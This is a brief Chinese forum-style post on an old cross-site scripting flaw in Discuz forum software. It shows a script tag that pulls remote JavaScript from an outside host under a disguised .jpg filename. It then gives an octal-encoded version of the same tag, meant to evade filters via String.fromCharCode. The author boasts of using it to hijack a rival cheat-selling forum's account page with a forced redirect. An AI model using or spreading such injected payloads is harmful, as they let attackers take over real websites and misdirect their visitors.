discuz xss(舊) script
其實呢,這個漏洞,還有一種變種的方式就是
String.fromCharCode
<script src=http://upload.lsforum.net/users/public/d12111m32.jpg></script>
074 163 143 162 151 160 164 040 163 162 143 075 150 164 164 160 072 057 057 165 160 154 157 141 144 056 154 163 146 157 162 165 155 056 156 145 164 057 165 163 145 162 163 057 160 165 142 154 151 143 057 144 061 062 061 061 061 155 063 062 056 152 160 147 076 074 057 163 143 162 151 160 164 076
統神大戰蛇王,去她賣掛論壇偷掛scrript發動小型戰役!!,實現一個小跳轉,就把她賣帳號的那個頁面,強迫跳轉 中二
http://upload.lsforum.net/users/public/d12111m32.jpg